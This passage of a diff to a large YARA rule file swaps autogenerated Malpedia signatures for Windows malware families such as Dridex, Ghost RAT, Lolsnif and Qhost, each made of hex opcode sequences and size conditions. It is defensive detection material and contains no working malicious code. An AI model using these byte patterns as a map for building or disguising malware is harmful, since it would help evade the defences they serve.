+		$sequence_8 = { 334ad8 3342dc 334a28 33422c 330a 334204 894cf428 }
+		$sequence_9 = { 56 33f6 ffb6b0784300 ff15???????? 8986b0784300 83c604 83fe28 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 724992
 }
-rule MALPEDIA_Win_Dridex_Auto : FILE
+rule MALPEDIA_Win_Qhost_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "82474897-84ac-57c0-bc01-9735ab6cae7c"
+		id = "b665b26d-0cb0-522b-ad4c-ae26d70948e9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dridex_auto.yar#L1-L1014"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.qhost_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "1b034dcf6182675bbb8a5eb0a34d263edee95de935cc41e9152b6cc845885549"
+		logic_hash = "9e1768d558cd3150b7b786a97888fc646ca0ae377a338c2bb336a3ca12cb703a"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -99001,147 +99090,32 @@ rule MALPEDIA_Win_Dridex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? b910270000 e8???????? e8???????? }
-		$sequence_1 = { ffd6 85c0 7512 e8???????? eb03 }
-		$sequence_2 = { 83f8ff 7505 e8???????? 3d34270000 }
-		$sequence_3 = { c605????????01 c3 c605????????00 c3 }
-		$sequence_4 = { ffd0 e8???????? 85c0 74de }
-		$sequence_5 = { ffd0 85c0 751f e8???????? }
-		$sequence_6 = { 53 53 53 6a01 53 ffd0 }
-		$sequence_7 = { eb0a e8???????? eb03 6a7f }
-		$sequence_8 = { 7406 42 803a00 75fa }
-		$sequence_9 = { c3 31c0 c3 50 }
-		$sequence_10 = { e8???????? 85c0 7407 56 ffd0 }
-		$sequence_11 = { 807c241400 7409 8d4c2410 e8???????? }
-		$sequence_12 = { 7403 56 ffd0 33f6 }
-		$sequence_13 = { e8???????? 85c0 7408 6a00 ffd0 }
-		$sequence_14 = { e8???????? 6880000000 53 53 }
-		$sequence_15 = { e8???????? 6a00 8d4e1c e8???????? }
-		$sequence_16 = { e8???????? eb0a b9d0070000 e8???????? }
-		$sequence_17 = { 85c0 7407 685a040000 ffd0 }
-		$sequence_18 = { e8???????? 3db20d7897 7508 c70350000000 }
-		$sequence_19 = { c70350000000 eb0d 3da665f63e 7506 c703bb010000 }
-		$sequence_20 = { ffd0 5b c3 33c0 }
-		$sequence_21 = { e8???????? 85c0 7404 6a7e ffd0 }
-		$sequence_22 = { 6a00 8bcf e8???????? 50 ffd6 }
-		$sequence_23 = { 8bc8 e8???????? 6a70 8bc8 e8???????? 6a73 }
-		$sequence_24 = { e8???????? e9???????? 807c245000 740a }
-		$sequence_25 = { 85c0 7415 6a01 6a00 6a00 }
-		$sequence_26 = { 7411 c7461003000000 e8???????? 894614 }
-		$sequence_27 = { e8???????? 6a29 8bc8 e8???????? }
-		$sequence_28 = { eb08 83ca20 eb03 83ca10 }
-		$sequence_29 = { e8???????? 8d4dc4 e8???????? 5e }
-		$sequence_30 = { 6a74 8bc8 e8???????? 6a74 }
-		$sequence_31 = { 50 e8???????? 8938 8b35???????? }
-		$sequence_32 = { 6a00 6a00 8d4dfc 51 6aff }
-		$sequence_33 = { 6810270000 50 e8???????? 83c410 }
-		$sequence_34 = { 85c0 7406 6a02 ff36 }
-		$sequence_35 = { e8???????? 50 56 8bcb e8???????? 50 e8???????? }
-		$sequence_36 = { 8b442428 6689c1 66894c2458 66894c245a }
-		$sequence_37 = { 740d 40 83c104 3d00100000 }
-		$sequence_38 = { 6a01 6a02 ffd0 8906 }
-		$sequence_39 = { 890424 894c2404 75dd 8b0424 }
-		$sequence_40 = { 885c2407 89442408 7598 8a442407 }
-		$sequence_41 = { eb00 8b442404 89c1 89ca }
-		$sequence_42 = { c7461002000000 eb0f c7461003000000 e8???????? }
-		$sequence_43 = { 740a 488d4c2448 e8???????? 488d4c2430 }
-		$sequence_44 = { eb0a b988130000 e8???????? 33d2 }
-		$sequence_45 = { 7534 eb00 31c0 89c1 }
-		$sequence_46 = { 31c0 89c1 8b442424 88c2 }
-		$sequence_47 = { 6a64 59 e8???????? 33c9 e8???????? }
-		$sequence_48 = { c20400 55 8bec 83ec34 8365fc00 }
-		$sequence_49 = { 33c0 803900 7411 ffc0 }
-		$sequence_50 = { 51 6880000000 68ffff0000 ff36 ffd0 }
-		$sequence_51 = { 8954242c 8b44242c 89c1 89ca }
-		$sequence_52 = { 8a442427 a801 7534 eb00 }
-		$sequence_53 = { e8???????? 8be8 85ed 7458 }
-		$sequence_54 = { e8???????? 84c0 740f 6a05 }
-		$sequence_55 = { e8???????? 6880000000 55 55 }
-		$sequence_56 = { ff7508 ffd0 33c0 40 5d c20400 }
-		$sequence_57 = { c3 55 8bec 837d0800 7422 }
-		$sequence_58 = { 8d4de0 51 68???????? ffd0 }
-		$sequence_59 = { 6a00 6a02 ffd0 50 }
-		$sequence_60 = { 6a73 e8???????? 833f00 7523 }
-		$sequence_61 = { e8???????? 8bc8 a1???????? ff30 e8???????? }
-		$sequence_62 = { 890424 e8???????? 31c0 83c420 5e }
-		$sequence_63 = { eb0c e8???????? 8bf0 eb03 6a7f }
-		$sequence_64 = { e8???????? 50 ffd7 85c0 7512 }
-		$sequence_65 = { 8b45cc 31c9 8b55d0 39c2 }
-		$sequence_66 = { 8038e9 89c1 8945d0 894dcc }
-		$sequence_67 = { e8???????? 50 53 8d4dd0 e8???????? 50 }
-		$sequence_68 = { 8b45e8 05ffff0000 25ffff0000 83c001 }
-		$sequence_69 = { 83c101 8b55ec 01ca 83fa00 }
-		$sequence_70 = { 8955b0 8975ac 897dc4 747b }
-		$sequence_71 = { 7517 8b0424 8b4801 89c2 01ca 83c205 }
-		$sequence_72 = { 89d3 8945f0 894dec 8955e8 }
-		$sequence_73 = { 83c001 8b4de8 01c1 894de0 }
-		$sequence_74 = { 894e1c 8b4a48 894e20 83c418 5e c3 53 }
-		$sequence_75 = { 57 56 83ec20 8b442430 890424 }
-		$sequence_76 = { 8b483c 6689ce 6683fe00 89c2 8945e8 }
-		$sequence_77 = { 890424 e8???????? 31c9 8b54241c 8b723c 8b7e3c 89f3 }
-		$sequence_78 = { e8???????? 89442418 e8???????? 83f800 }
-		$sequence_79 = { 8b513c 6689d6 6683fe00 89cf 8945f0 894dec }
-		$sequence_80 = { 01ca 83c205 807c0805e9 891424 74e9 8b0424 }
-		$sequence_81 = { 7418 8b45f4 05ffff0000 25ffff0000 }
-		$sequence_82 = { 8945c4 894dc0 885dbf 8975b8 }
-		$sequence_83 = { c7424800b00400 8b7de4 c787cc00000000000000 c787c800000000000000 8945dc }
-		$sequence_84 = { c3 55 89e5 57 56 53 83ec54 }
-		$sequence_85 = { 89c6 8945f8 894df4 8975f0 7418 8b45f4 }
-		$sequence_86 = { 57 83ec38 8b450c 8b4d08 }
-		$sequence_87 = { 83c454 5b 5e 5f 5d c3 55 }
-		$sequence_88 = { 01c1 894df0 8b45f0 83c40c 5e 5d }
-		$sequence_89 = { 25ffff0000 83c001 8b4df8 01c1 894df0 8b45f0 }
-		$sequence_90 = { 25ffff0000 83c001 8b4da8 01c1 }
-		$sequence_91 = { 5b 5e 5d c3 55 89e5 6a00 }
-		$sequence_92 = { e9???????? 8b45e0 83c45c 5f 5b 5e }
-		$sequence_93 = { 53 57 83ec5c 8b450c }
-		$sequence_94 = { 5b 5d c3 8b45d0 8b4dd4 }
-		$sequence_95 = { 57 83ec20 8b4508 890424 8945f0 }
-		$sequence_96 = { 8b0c8504406e00 8b55f8 39d1 8945ec }
-		$sequence_97 = { 8955c8 895dc4 8945e4 0f85dafeffff 8b45e4 83c474 5b }
-		$sequence_98 = { 53 83ec74 8b450c 8b4d08 31d2 }
-		$sequence_99 = { 53 56 83ec38 8b450c }
-		$sequence_100 = { 83c470 5b 5f 5e 5d c3 }
-		$sequence_101 = { 5d c3 8b45f0 8b0c8504406e00 8b55f8 }
-		$sequence_102 = { 7505 e9???????? 8b45e0 83c438 5e 5b 5f }
-		$sequence_103 = { 53 81ecb0000000 8b4508 8d4dd8 }
-		$sequence_104 = { 75e4 83c448 5e 5f 5b 5d }
-		$sequence_105 = { 8955cc 74bc 8b45cc 83c454 5b 5e }
-		$sequence_106 = { 8b4508 8d0d30306e00 31d2 890c24 }
-		$sequence_107 = { e8???????? 8d0dd8302400 890424 894c2404 }
-		$sequence_108 = { c3 55 89e5 53 56 57 83ec38 }
-		$sequence_109 = { 033c8a 897dd8 8b45d8 83c444 5b 5e }
-		$sequence_110 = { e9???????? 8b45e0 83c438 5f 5e 5b }
-		$sequence_111 = { 8945a8 0f84e2feffff e9???????? 8b45e0 83c45c 5e 5f }
-		$sequence_112 = { c3 55 89e5 56 53 57 83ec54 }
-		$sequence_113 = { 8d0dbc306e00 890424 894c2404 e8???????? }
-		$sequence_114 = { 8b55f4 8b75ec 89723c c7424004000000 c742442c0c0200 c7424800b00400 }
-		$sequence_115 = { 894628 890c24 c744240400000000 8955dc e8???????? 8d0de8306e00 890424 }
-		$sequence_116 = { e8???????? 8d0d44306e00 31d2 8b75f8 894620 }
-		$sequence_117 = { 8b45cc 83c454 5f 5b 5e 5d }
-		$sequence_118 = { 8d0d44302f00 31d2 890c24 c744240400000000 8945fc 8955f8 e8???????? }
-		$sequence_119 = { 8955c8 8945d0 74e4 31c0 8d0d5a232f00 }
-		$sequence_120 = { 8d0d44308400 31d2 8b75f8 89460c }
-		$sequence_121 = { c3 55 89e5 8d055a238400 5d c3 55 }
-		$sequence_122 = { 53 83ec44 8b4508 8d0d30302700 }
-		$sequence_123 = { 53 83ec54 8d055a238400 31c9 8d55d8 }
-		$sequence_124 = { 890c24 c744240400000000 8955e8 e8???????? 8d0dbc308400 }
+		$sequence_0 = { 7529 83bd6cffffff01 7520 8b55f8 81e2ffff0000 }
+		$sequence_1 = { 7528 83bd6cffffff01 751f 8b45f8 25ffff0000 83f801 7512 }
+		$sequence_2 = { e8???????? 50 8b8de0fdffff 51 e8???????? 83c408 8985ecfdffff }
+		$sequence_3 = { 8b4d08 51 e8???????? 83c418 8945fc eb30 837d1807 }
+		$sequence_4 = { 8b55f4 c682????????0a ebd5 8b45fc 50 ff15???????? }
+		$sequence_5 = { 837df800 741e 8b45fc 50 68???????? 68???????? ff15???????? }
+		$sequence_6 = { 33c0 837d1801 0f94c0 8885c4f9ffff }
+		$sequence_7 = { 0f84ab000000 8d559c 52 6a00 ff15???????? }
+		$sequence_8 = { 398da0f4ffff 0f8f84000000 8b95a0f4ffff 89959cf4ffff 8b85a0f4ffff 0500040000 }
+		$sequence_9 = { 7407 c745fcffffffff 8b45fc 8be5 5d }
 
 	condition:
-		7 of them and filesize < 1040384
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Roadsweep_Auto : FILE
+rule MALPEDIA_Win_Lolsnif_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "02905efb-d1f3-5f29-9698-5892918b9e96"
+		id = "0289e06c-9994-5dbb-86c9-fe5c529484d1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roadsweep"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.roadsweep_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lolsnif"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lolsnif_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "10ecfffb9395be461cfda7fab93323fb263ae9a44a4ace806928ac7c12ed7628"
+		logic_hash = "722f048f7ac9bac7fbc30da76accd223a5f740835920efce86d99d762f17104c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99155,32 +99129,32 @@ rule MALPEDIA_Win_Roadsweep_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1f902 0fb691b0914000 88141e 8b18 46 }
-		$sequence_1 = { 8944240c 8b4514 89442404 ff521c 8b75c8 31c9 }
-		$sequence_2 = { 85c0 740c 31c0 8b5df8 8b75fc 89ec 5d }
-		$sequence_3 = { 7403 83cb01 84c9 7409 8b4d18 8b39 01f8 }
-		$sequence_4 = { 5b 5e 5f 5d c3 85c0 750d }
-		$sequence_5 = { 89e5 fc 83ec08 b90e000000 891c24 8b5d08 897c2404 }
-		$sequence_6 = { 8b9540ffffff 891424 e8???????? c745a001000000 e8???????? 83c518 837da001 }
-		$sequence_7 = { c744240400000000 83ee64 891c24 e8???????? }
-		$sequence_8 = { c68565fdffff23 c68566fdffff5b c68567fdffff55 c68568fdffff7f c68569fdffff36 c6856afdffff7e c6856bfdffff76 }
-		$sequence_9 = { 89542408 891c24 e8???????? 893424 e8???????? 8b4510 }
+		$sequence_0 = { 8908 eb20 bfd2100000 eb19 bfe8000000 eb12 81ff02010000 }
+		$sequence_1 = { eb03 897508 8b7d08 3bfe 745e 3bde 7411 }
+		$sequence_2 = { 754b 397c2434 742c a1???????? 8b401c 85c0 7506 }
+		$sequence_3 = { 8bc3 8935???????? e8???????? ff35???????? ff15???????? f605????????01 }
+		$sequence_4 = { ff35???????? ff15???????? 391d???????? 7405 e8???????? be6fd463aa 3935???????? }
+		$sequence_5 = { 50 8d45f4 50 53 6a03 e8???????? 3bc3 }
+		$sequence_6 = { ff75f4 6822010000 e9???????? 3d935aaf70 744d 3dd808c373 7437 }
+		$sequence_7 = { 7510 8d45e8 c745e880969800 897dec }
+		$sequence_8 = { 740b 83c704 43 83fb03 72ea eb05 }
+		$sequence_9 = { 53 57 8b3d???????? 56 ffd7 83c414 ff7510 }
 
 	condition:
-		7 of them and filesize < 160768
+		7 of them and filesize < 425984
 }
-rule MALPEDIA_Win_Icefog_Auto : FILE
+rule MALPEDIA_Win_Dmsniff_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0a48d625-5699-565a-9775-5f80c9e1ec87"
+		id = "3835a0ad-5401-5196-a04a-4e4d20ae32c6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.icefog_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dmsniff_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "487424ea94183e95a7a3963011eba4b3e92a928a4a25ab7f953a01dda9030416"
+		logic_hash = "9e4ba2c64d589b228eae63b3a713959af97846eab54c3823ca80a7bfedbc8089"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99194,34 +99168,34 @@ rule MALPEDIA_Win_Icefog_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 56 52 e8???????? 83c414 e9???????? 33c0 }
-		$sequence_1 = { 50 8b82a8000000 6a00 51 50 e8???????? 8b45fc }
-		$sequence_2 = { ba00060000 660bc2 6689431c 8b45fc 5f 894314 894324 }
-		$sequence_3 = { 8b460c 8bda 99 03c8 8b4614 13da 99 }
-		$sequence_4 = { e9???????? 8a4602 83c602 84c0 7416 8d642400 3c2a }
-		$sequence_5 = { 8b4304 6a01 50 897df4 e8???????? 8b03 83c414 }
-		$sequence_6 = { e8???????? 83c40c 5d c3 b8???????? c3 a1???????? }
-		$sequence_7 = { e8???????? 83c40c 8bf8 eb03 8b5df0 8b45fc 85c0 }
-		$sequence_8 = { 51 e8???????? 53 8bf0 8995b0feffff e8???????? 8bc8 }
-		$sequence_9 = { 50 68???????? 56 e8???????? 8bd8 83c420 85db }
+		$sequence_0 = { ff7508 e8???????? 89c7 6a00 }
+		$sequence_1 = { 57 be19000200 8d45fc 50 56 }
+		$sequence_2 = { 40 803c0100 75f9 6a01 50 }
+		$sequence_3 = { f7e7 8945f0 50 e8???????? 89c3 81e3ff000000 89de }
+		$sequence_4 = { eb03 31c0 40 5f 5e c9 }
+		$sequence_5 = { 89c7 6a00 6a00 56 53 57 }
+		$sequence_6 = { 83c41c 89c7 09ff 7507 31c0 }
+		$sequence_7 = { 31c9 8b442408 8a140e 881408 803c0e00 }
+		$sequence_8 = { eb3a ff7518 ff7514 ff751c 6a00 }
+		$sequence_9 = { 6a00 68???????? e8???????? 89c7 09ff }
 
 	condition:
-		7 of them and filesize < 1187840
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Pipcreat_Auto : FILE
+rule MALPEDIA_Win_Ghost_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8419290f-1015-5dec-8abc-87fb98932602"
+		id = "e442a566-13fc-5122-ba83-74fd22421a05"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pipcreat_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ghost_rat_auto.yar#L1-L316"
 		license_url = "N/A"
-		logic_hash = "bfd77063c9003804a72d5e23f231f6f0ede323cbb3ca337d538e8165945eb11a"
+		logic_hash = "ec6224b8ae12982eada904cedab10d4c1635a00f1f82b5bceec6389113a6ffb4"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -99233,32 +99207,55 @@ rule MALPEDIA_Win_Pipcreat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 75cb 8bc6 53 6bc02c c784055ceeffffffff0000 }
-		$sequence_1 = { ebd8 6a01 ffd6 33db bfc4400010 be10480010 }
-		$sequence_2 = { 668915???????? ffd6 68???????? 68???????? ffd6 68???????? e8???????? }
-		$sequence_3 = { 50 8d8528feffff 6aff 50 53 53 }
-		$sequence_4 = { 5e 81c4140a0000 c3 668b0d???????? }
-		$sequence_5 = { ff15???????? 8b35???????? 68???????? 68???????? ffd6 668b4c2410 668b15???????? }
-		$sequence_6 = { 8945f8 7f14 68e8030000 ffd6 ff4dfc 395dfc 7fd4 }
-		$sequence_7 = { 33db 57 8d85f8efffff 53 50 }
-		$sequence_8 = { 66899d28ffffff f3ab 66ab 8d8528feffff }
-		$sequence_9 = { 6a00 8b0d???????? 6a00 8d442420 6a00 }
+		$sequence_0 = { 6a01 56 ff15???????? 5e c20800 }
+		$sequence_1 = { 8bd9 e8???????? 8b4d08 3bc8 }
+		$sequence_2 = { 8b400c 85c0 7505 a1???????? 50 8bce }
+		$sequence_3 = { 6a6b 8bce e8???????? 5f }
+		$sequence_4 = { 5d c20400 894df4 c745f800000000 df6df4 }
+		$sequence_5 = { df6df4 83ec08 dc0d???????? dd1c24 ff15???????? }
+		$sequence_6 = { e9???????? 8d45dc 50 681f000200 }
+		$sequence_7 = { ffd3 8bd8 85db 750d 5f 5e 5d }
+		$sequence_8 = { 83c454 c20400 8d7901 57 ff15???????? 8bcf 8bd8 }
+		$sequence_9 = { 68???????? 68???????? 6a00 6a00 c705????????20010000 e8???????? 8b35???????? }
+		$sequence_10 = { 8365fc00 ff7508 ff15???????? 40 50 ff15???????? 59 }
+		$sequence_11 = { ff7510 ff75dc ff15???????? 85c0 7507 c745e401000000 }
+		$sequence_12 = { 50 8d442434 894c2438 50 6a00 c744243c01000000 }
+		$sequence_13 = { 8dbd85feffff f3ab 66ab aa }
+		$sequence_14 = { 8d85c0feffff 50 57 ff15???????? 8bf8 }
+		$sequence_15 = { ff15???????? 8b4e04 e8???????? 33c0 5e }
+		$sequence_16 = { 6a00 ff7628 ff15???????? 6a01 ff7620 ff15???????? 8b4e04 }
+		$sequence_17 = { ffb6a8000000 ff15???????? ffb6ac000000 ff15???????? }
+		$sequence_18 = { 6a00 50 e8???????? 83c40c ff7508 6a40 ff15???????? }
+		$sequence_19 = { 56 ff15???????? 6a71 8bcf e8???????? 5f 5e }
+		$sequence_20 = { 5f 5e 5b 83c454 c20400 }
+		$sequence_21 = { c744242400000000 c644241c05 885c241d c644241e00 885c241f }
+		$sequence_22 = { 68???????? 50 6802000080 e8???????? 83c41c 5f 5e }
+		$sequence_23 = { 8bfe f2ae f7d1 49 7509 5f }
+		$sequence_24 = { 6a00 6838040000 6a00 6a00 }
+		$sequence_25 = { 8b7e20 8b36 813f6b006500 7406 813f4b004500 }
+		$sequence_26 = { 83e9fc c70161727941 83e9fc c70100000000 }
+		$sequence_27 = { c7014c6f6164 83e9fc c7014c696272 83e9fc }
+		$sequence_28 = { 89855cffffff 8b8d5cffffff 66c7014242 8b955cffffff 8b423c 8945ec }
+		$sequence_29 = { 8945e4 8b4ddc 81c1f8000000 894dd8 8b55e4 8b4220 }
+		$sequence_30 = { 83c002 8945f0 eb9e 8b4df0 894dfc e9???????? 8be5 }
+		$sequence_31 = { 8945ec 8b45ec 8b08 034df8 8b55ec 890a 8b45f0 }
+		$sequence_32 = { 898570ffffff e8???????? 6a40 6800100000 8b45d0 }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 357376
 }
-rule MALPEDIA_Win_Imprudentcook_Auto : FILE
+rule MALPEDIA_Win_Atharvan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e705cf05-f0e2-52d1-a85e-1511f7ba8697"
+		id = "3c02a0c3-381c-58dd-b6d4-bea79ed0706c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.imprudentcook"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.imprudentcook_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atharvan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.atharvan_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "7d085ab823410a63e41a516b8f50c0d9f8600ba4763b5093b512309c5b8e436e"
+		logic_hash = "0acd4bed1957d388586b468893d24540b89fb41ef5b3efe72287a455a5c18d66"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99272,32 +99269,32 @@ rule MALPEDIA_Win_Imprudentcook_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7310 660f1f440000 4983c508 49ff4500 74f6 488bbc2498000000 488bce }
-		$sequence_1 = { bb02000000 488d5568 488d4d68 448bcb 4c8bc6 e8???????? 4885c0 }
-		$sequence_2 = { 4c8bef 48ffc7 448bf9 f7e1 c1ea07 8bc2 4803c7 }
-		$sequence_3 = { e8???????? 4c8b6c2438 41b91e000000 4d8bc6 488bd3 498bcd e8???????? }
-		$sequence_4 = { 418bc3 48c1ea20 48c1e120 4803c8 488d0419 483bc1 488906 }
-		$sequence_5 = { 4885f6 750f 4885ff 7450 49893e be01000000 eb46 }
-		$sequence_6 = { 498b1439 488b5c2478 488b4dd0 4803ca 483bca 49890c39 488b4de0 }
-		$sequence_7 = { 4d0fafc6 4c8bd3 49c1ea20 480fafd1 4c0fafd9 4a8d0402 4c03d0 }
-		$sequence_8 = { 498bc2 33ed 48c1e004 4c03f8 4c89bc2400010000 4d85c0 0f8eb5000000 }
-		$sequence_9 = { 84c0 7506 4883eb08 75ed 48ffc3 488bcb 48d3ea }
+		$sequence_0 = { 488d4c2460 ff15???????? 0f57c0 488d9540020000 33c0 4533c9 48894598 }
+		$sequence_1 = { 4883c004 413bd0 7cf0 8bcf ff15???????? e9???????? }
+		$sequence_2 = { 488945f0 488d4588 4889442448 488d45a0 4889442440 }
+		$sequence_3 = { 0f8403010000 488d050eea0000 4a8b04e8 42385cf838 0f8ded000000 e8???????? 488b8890000000 }
+		$sequence_4 = { 4883ec20 84c9 752f 488d1d3f380100 488b0b 4885c9 7410 }
+		$sequence_5 = { 0fb602 84c0 75f1 488d0df2360200 ff15???????? 488bd8 }
+		$sequence_6 = { 0fb601 84c0 75f1 488d542430 488d4d60 e8???????? 488bd8 }
+		$sequence_7 = { 488bce e8???????? eb1a 0fb6d1 c7862002000001000000 488bce 4c8d442451 }
+		$sequence_8 = { 488d4da0 41b804010000 e8???????? 4d8bc4 488d8db0000000 ba04010000 }
+		$sequence_9 = { 488945ff 488d05a0b60000 4889450f 488d05a5b60000 48895507 }
 
 	condition:
-		7 of them and filesize < 864256
+		7 of them and filesize < 348160
 }
-rule MALPEDIA_Win_Doorme_Auto : FILE
+rule MALPEDIA_Win_Webbytea_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ef34215c-21dc-5b70-9e46-024fa7a7faa3"
+		id = "289bbfb0-4c87-5ec8-bb1c-f221332bf4ea"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.doorme_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webbytea"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webbytea_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "7a262e46ac547aa0a1d170d6c95f7394f8a304e152ade6a1fdc4d6407588a287"
+		logic_hash = "5634a8f7fcf9d0a5da9524118130e9bacc28a4059c716e709153bee5aa0b255e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99311,32 +99308,32 @@ rule MALPEDIA_Win_Doorme_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4180f04b 4488442434 4180f14b 44884c2435 4180f24b 4488542436 44885c2437 }
-		$sequence_1 = { 0f87c8010000 e8???????? 660f6f05???????? f30f7f442450 c644244000 488b542438 4883fa10 }
-		$sequence_2 = { 4a8d0432 488bd9 483bc8 480f42d8 488bc3 48897c2458 4883c001 }
-		$sequence_3 = { 4883c428 e9???????? 83f808 7d14 488d0c80 488d05f03d0300 488d0cc8 }
-		$sequence_4 = { 0f87e4010000 498bc8 e8???????? 49897f10 49c747180f000000 41c60700 }
-		$sequence_5 = { e8???????? 660f6f05???????? f30f7f4588 c644247800 498b5618 4883fa10 0f82e2010000 }
-		$sequence_6 = { 488d1560b90100 c4e2c9abe9 c4817b1004c1 c4a153581cc2 c5f928cb c5e35cda c4e2c9b905???????? }
-		$sequence_7 = { 4c8d0dc8ca0100 8bf9 488d158f860100 b903000000 4c8d05abca0100 e8???????? 488bd3 }
-		$sequence_8 = { 4053 4883ec20 84c9 752f 488d1d2b730200 488b0b 4885c9 }
-		$sequence_9 = { 4883c510 4c8d15f06b0300 48836c243001 0f8564feffff 4c8bc6 448d4a04 4c8d15d66b0300 }
+		$sequence_0 = { c68424f100000072 c68424f200000065 c68424f300000061 c68424f400000074 }
+		$sequence_1 = { ff15???????? 85c0 7444 41b904000000 }
+		$sequence_2 = { 8901 488d542430 488b4c2420 ff15???????? }
+		$sequence_3 = { c7042400000000 eb08 8b0424 ffc0 890424 8b442438 }
+		$sequence_4 = { ffc0 488b8c2488020000 8901 488d542430 488b4c2420 ff15???????? 85c0 }
+		$sequence_5 = { 8b00 ffc0 488b8c2488020000 8901 488d542430 488b4c2420 }
+		$sequence_6 = { 8b542438 891481 488b842488020000 8b00 ffc0 488b8c2488020000 8901 }
+		$sequence_7 = { ffc0 488b8c2488020000 8901 488d542430 488b4c2420 ff15???????? }
+		$sequence_8 = { 4803c8 488bc1 48c744243000000000 c744242800000000 }
+		$sequence_9 = { ffc0 890424 8b442438 390424 }
 
 	condition:
-		7 of them and filesize < 580608
+		7 of them and filesize < 552960
 }
-rule MALPEDIA_Win_Graphican_Auto : FILE
+rule MALPEDIA_Win_Gamotrol_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "82332df7-f8b2-5311-821b-79a046dc5e4d"
+		id = "6d872926-0049-5e26-8ed8-52fa5b44bb44"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphican"
